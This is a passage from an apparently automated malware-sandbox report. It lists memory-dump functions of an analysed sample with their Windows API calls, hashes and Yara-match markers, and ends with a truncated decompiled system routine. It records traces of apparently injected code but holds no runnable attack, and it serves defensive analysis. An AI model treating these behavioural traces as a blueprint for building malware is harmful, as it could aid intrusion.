                                          • Associated: 00000007.00000002.663536466.00000000023F0000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663545005.0000000002400000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663553811.0000000002404000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663561380.0000000002407000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663567943.0000000002410000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663609294.0000000002470000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                          • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                          • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                          • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0231FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.663448508.0000000002310000.00000040.00000001.sdmp, Offset: 02300000, based on PE: true
                                          • Associated: 00000007.00000002.663440597.0000000002300000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663536466.00000000023F0000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663545005.0000000002400000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663553811.0000000002404000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663561380.0000000002407000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663567943.0000000002410000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663609294.0000000002470000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                          • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                          • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                          • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0231FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.663448508.0000000002310000.00000040.00000001.sdmp, Offset: 02300000, based on PE: true
                                          • Associated: 00000007.00000002.663440597.0000000002300000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663536466.00000000023F0000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663545005.0000000002400000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663553811.0000000002404000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663561380.0000000002407000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663567943.0000000002410000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663609294.0000000002470000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                          • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                          • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                          • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0231FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.663448508.0000000002310000.00000040.00000001.sdmp, Offset: 02300000, based on PE: true
                                          • Associated: 00000007.00000002.663440597.0000000002300000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663536466.00000000023F0000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663545005.0000000002400000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663553811.0000000002404000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663561380.0000000002407000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663567943.0000000002410000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663609294.0000000002470000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                          • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                          • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                          • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0231FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.663448508.0000000002310000.00000040.00000001.sdmp, Offset: 02300000, based on PE: true
                                          • Associated: 00000007.00000002.663440597.0000000002300000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663536466.00000000023F0000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663545005.0000000002400000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663553811.0000000002404000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663561380.0000000002407000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663567943.0000000002410000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.663609294.0000000002470000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                          • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                          • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                          • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00089080, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • Sleep.KERNELBASE(000007D0), ref: 00089128
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep
                                          • String ID: net.dll$wininet.dll
                                          • API String ID: 3472027048-1269752229
                                          • Opcode ID: 7a610f761d0da1d75e76726c77c53804720eb4ac1e2d24cbc414290cef663861
                                          • Instruction ID: 4d3ac149512791c60a8de0cf03998bd12f1840dbb63f8b6bb02397ee00bc4fa3
                                          • Opcode Fuzzy Hash: 7a610f761d0da1d75e76726c77c53804720eb4ac1e2d24cbc414290cef663861
                                          • Instruction Fuzzy Hash: F33181B2504745BBC724EF64C889FABB7F8BB48B01F14811DF66A5B245D730A550CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00089077, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 85sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • Sleep.KERNELBASE(000007D0), ref: 00089128
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep
                                          • String ID: net.dll$wininet.dll
                                          • API String ID: 3472027048-1269752229
                                          • Opcode ID: 2e09a70a86042011d161ccef771d5de3d72bfdd714e2fe189719bc451aaa146b
                                          • Instruction ID: a8e28ce8bdb9185626b52159660f89df9dfdb73c6f94c503f2951aa83f2187ce
                                          • Opcode Fuzzy Hash: 2e09a70a86042011d161ccef771d5de3d72bfdd714e2fe189719bc451aaa146b
                                          • Instruction Fuzzy Hash: 0531D172A04341AFCB24EF64C889BABB7B4FB84B01F148019E6695B246D770A550CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0008A670, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00073AF8), ref: 0008A69D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID: .z`
                                          • API String ID: 3298025750-1441809116
                                          • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                          • Instruction ID: b1adadced4e596734d2d0af44297bb8e8c393ebae0ceedf6b099442860b86ea7
                                          • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                          • Instruction Fuzzy Hash: 51E012B1200208ABDB18EF99CC49EA777ACEF88750F118559BA085B242C630E9108AB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00078308, Relevance: 3.1, APIs: 2, Instructions: 59threadwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0007836A
                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0007838B
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: 34a3d6ce9b88c82aa82a3af7a5af5dd617036f359c3f8d9b5d983300588b2936
                                          • Instruction ID: 60d2ceb544d190b8fa2ee102406c3263c0a9afce836986655f1dc26a25fb6585
                                          • Opcode Fuzzy Hash: 34a3d6ce9b88c82aa82a3af7a5af5dd617036f359c3f8d9b5d983300588b2936
                                          • Instruction Fuzzy Hash: 0C01F931A802287AE720BA949C43FEE7768AB41B50F144119FF04BA1C2E6E8290647F5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00078310, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0007836A
                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0007838B
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                          • Instruction ID: 99fc67312efd1e265522b70dd9cf0e19dfa4fb158b14fb9739e95ef2428e8a84
                                          • Opcode Fuzzy Hash: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                          • Instruction Fuzzy Hash: F8018431A802287AE721A6949C47FFE776C6B41F50F054114FF08BA1C2EAA86A0547F6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00078393, Relevance: 3.0, APIs: 2, Instructions: 44threadwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0007836A
                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0007838B
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: 7127c396a87752670c534911c128140033d3bc4d46b1bdca97281a35ad76dd19
                                          • Instruction ID: 996c0e03ec75aca44cf0650043165f2ec21d991d77e6d948f3e9b997bcd1f40a
                                          • Opcode Fuzzy Hash: 7127c396a87752670c534911c128140033d3bc4d46b1bdca97281a35ad76dd19
                                          • Instruction Fuzzy Hash: 45F0E931BC113435E22115545C0BFFE6B48DB81F61F148159FF0CE90C2E9C9290103EA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0008A7C2, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                          Download Yara Rule
                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0007F1D2,0007F1D2,?,00000000,?,?), ref: 0008A800
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: e2f572313c9d802809798fe8f9778fac9185a76eb301d0c837502928c64d6175
                                          • Instruction ID: 1ad4483f9f24ce1a9d8309a8bd1a2396550a3627854eb11548088fcc5fe2e69b
                                          • Opcode Fuzzy Hash: e2f572313c9d802809798fe8f9778fac9185a76eb301d0c837502928c64d6175
                                          • Instruction Fuzzy Hash: 231191B5300248ABDB14EF98DC80DEB77A9FF89314F10855AF94997602C634E8118BB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0007ACF0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0007AD62
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                          • Instruction ID: 103fea0457ff06912c94920778916d868279ba7587f5b5f25d0e5b48dd3051e2
                                          • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                          • Instruction Fuzzy Hash: 600112B5E4010DA7DF10EBA4DC42FDDB3B8AB54308F108595E90D97642F635EB148B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0008A6E0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0008A734
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: CreateInternalProcess
                                          • String ID:
                                          • API String ID: 2186235152-0
                                          • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                          • Instruction ID: 0476b1f1081adc5770f695d19d77e3fccb12c3c89d2a1220b84b869ae91f608c
                                          • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                          • Instruction Fuzzy Hash: A201B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 000891A5, Relevance: 1.5, APIs: 1, Instructions: 37threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0007F050,?,?,00000000), ref: 000891EC
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID:
                                          • API String ID: 2422867632-0
                                          • Opcode ID: 236890109d5f47e6558ac83bc9aeef32022f5cbfd77f367dac5f0e44bb39fd7d
                                          • Instruction ID: 30cba1fb75781945e69a9b35cb7ca5d2609d11f2abe6e541c4dc01d4ecccfac4
                                          • Opcode Fuzzy Hash: 236890109d5f47e6558ac83bc9aeef32022f5cbfd77f367dac5f0e44bb39fd7d
                                          • Instruction Fuzzy Hash: 70F0237968974135E73072745C87FF76A456F91B10F180526F2987E5C3D8D8A4054395
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 000891B0, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0007F050,?,?,00000000), ref: 000891EC
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID:
                                          • API String ID: 2422867632-0
                                          • Opcode ID: b68e6f369081869e3b8fd31e12c5b2d380daa11ca5a0600d0435d8fbc4efec32
                                          • Instruction ID: 373d9e65f5d98bb607dccc2aa7936598134940a3505fe9e58512421c90d47018
                                          • Opcode Fuzzy Hash: b68e6f369081869e3b8fd31e12c5b2d380daa11ca5a0600d0435d8fbc4efec32
                                          • Instruction Fuzzy Hash: 8EE06D373802043AE62075A9AC02FE7B29CAB91B20F150026FA4DEA2C2D995F80143A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0008A630, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00084536,?,00084CAF,00084CAF,?,00084536,?,?,?,?,?,00000000,00000000,?), ref: 0008A65D
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                          • Instruction ID: e4a3b5555a0ecd646342859cfd2bfc0e18779972e92a541dd2b9e21fbb41912f
                                          • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                          • Instruction Fuzzy Hash: ADE012B1200208ABDB14EF99CC41EA777ACEF88654F118559BA085B242C630F9108BB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0008A7D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                          Download Yara Rule
                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0007F1D2,0007F1D2,?,00000000,?,?), ref: 0008A800
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                          • Instruction ID: 309186c580a382a61ffb9c83d2a66c2228bcd0ac1c2c8a2cf842a7d5d9f71115
                                          • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                          • Instruction Fuzzy Hash: 8CE01AB12002086BDB10EF89CC85EE737ADEF89650F118165BA0857242C934E8108BF5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0007F6D0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNELBASE(00008003,?,00078D14,?), ref: 0007F6FB
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                          • Instruction ID: 2b497bff48ec278f26eba221411dd280b8d181ac00b0d1e7ba025ff9b24c22e2
                                          • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                          • Instruction Fuzzy Hash: 9BD05E616503092AE610BAA49C03F6632C86B44B04F4A4064FA48962C3E954E4014165
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 02348788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 94%
                                          			E02348788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E02348460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E0232E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0234718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E02348460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E0232E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0234718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E02348460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E02348460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E02348460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E0232E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E0232E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0234718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E0232E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E02322340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E0233E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E0232E2A8(_t322,  &_v68, _v16);
								if(E02345553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E0233E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E0232E2A8(_t322,  &_v68, _t236);
								if(E02345553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E0232E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E0232E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0234718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E0232E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E02322340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E0233E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E0232E2A8(_v12,  &_v68, _v16);
							if(E02345553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E0233E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E0232E2A8(_t322,  &_v68, _t269);
							if(E02345553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E0232E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E0232E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E0234718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E0232E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E02322340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E0233E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E0232E2A8(_v12,  &_v68, _v16);
						if(E02345553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E0233E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E0232E2A8(_t322,  &_v68, _t296);
						if(E02345553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E0232E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E0232E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                          0x02348788
                                          0x02348788
                                          0x02348791
                                          0x02348794
                                          0x02348798
                                          0x0234879b
                                          0x0234879e
                                          0x023487a1
                                          0x023487a4
                                          0x023487a7
                                          0x023487aa
